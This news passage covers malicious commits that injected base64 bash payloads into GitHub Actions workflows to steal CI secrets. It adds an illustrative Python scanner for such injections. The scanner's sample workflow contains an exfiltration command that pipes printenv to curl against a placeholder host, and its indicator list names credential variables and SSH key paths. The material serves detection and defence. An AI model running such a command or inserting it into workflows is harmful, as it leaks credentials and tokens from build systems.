Unexpected workflow_dispatch runs in the Actions tab can be a warning sign, the researchers said in a blog post. “If you use OIDC federation for cloud deployments, review cloud audit logs for token requests from unknown workflow runs.”
The malicious commits were observed modifying GitHub Actions workflows to include base64-encoded bash payloads designed to steal secrets exposed during CI execution, including cloud credentials, SSH keys, OpenID Connect (OIDC) tokens, source-code secrets, and other environment variables.
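A triage script for the tampering pattern described above, added here as an example rather than code from the article or from the researchers it cites. It assumes the injected payload takes the form the article describes, a base64 literal decoded and piped into a shell inside a `run:` step (for instance `echo <b64> | base64 -d | bash`); the regular expressions, the indicator list and the sample workflow are all constructed for illustration, not published indicators from the campaign.

```python
"""Scan GitHub Actions workflow text for base64 payloads fed to a shell.

Added example, not code from the article or the researchers it cites.
Assumption: the payload appears as a base64 literal that is decoded and
piped into a shell inside a run step. The patterns, indicator list and
sample workflow below are constructed for illustration.
"""
import base64
import binascii
import re

# A run step that decodes base64 and hands the result to a shell.
DECODE_TO_SHELL = re.compile(
    r"base64\s+(?:-d|--decode|-D)\b[^\n]*\|\s*(?:ba)?sh\b"
)
# A base64 literal long enough to carry a command rather than a short token.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Strings in a decoded payload that point at theft of CI secrets. Constructed
# list; ACTIONS_ID_TOKEN_REQUEST_* are the variables GitHub exposes for OIDC.
SUSPICIOUS_TOKENS = (
    "printenv", "env |", "curl", "wget",
    "ACTIONS_ID_TOKEN_REQUEST_TOKEN", "ACTIONS_ID_TOKEN_REQUEST_URL",
    "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN", "id_rsa", "/.ssh/",
)


def decode_b64(blob: str):
    """Return the decoded text of a strict base64 literal, or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def scan_workflow(text: str):
    """Return one finding per line that decodes base64 into a shell.

    Each finding records the 1-based line number, the decoded payload and
    which SUSPICIOUS_TOKENS appear in it. An empty indicator list still
    means a command was smuggled in as base64 and deserves a look.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not DECODE_TO_SHELL.search(line):
            continue
        for blob in B64_LITERAL.findall(line):
            decoded = decode_b64(blob)
            if decoded is None:
                continue
            findings.append({
                "line": lineno,
                "decoded": decoded,
                "indicators": [t for t in SUSPICIOUS_TOKENS if t in decoded],
            })
    return findings


# Constructed sample: one benign base64 use (a certificate written to disk)
# and one injected step that decodes a command and pipes it into bash.
SAMPLE_PAYLOAD = "printenv | curl -sS -X POST --data-binary @- https://example.invalid/c"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
SAMPLE_WORKFLOW = f"""name: ci
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install signing cert
        run: echo "$SIGNING_CERT_B64" | base64 -d > cert.pem
      - name: Build
        run: echo {SAMPLE_B64} | base64 -d | bash
"""

if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"line {f['line']}: {f['indicators']}\n  {f['decoded']}")
```

Run it over every file under `.github/workflows/` in the suspect commits; the benign certificate step is ignored because nothing is piped into a shell, while the injected step is decoded and flagged on `printenv` and `curl`. Attackers vary the encoding and the interpreter, so treat a match as a starting point for review rather than a complete detector.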
Among the hardest-hit projects were Wiznet’s ioLibrary_Driver repository, four Tiledesk repositories, and four persian-tools repositories, with well over 2,000 malicious commits between them.
A later blog post by OX Security flagged some similarities to the widespread TeamPCP compromises, particularly the use of hardcoded historical commit dates, a trick used in TeamPCP-linked operations to hide the true timing of malicious activity.



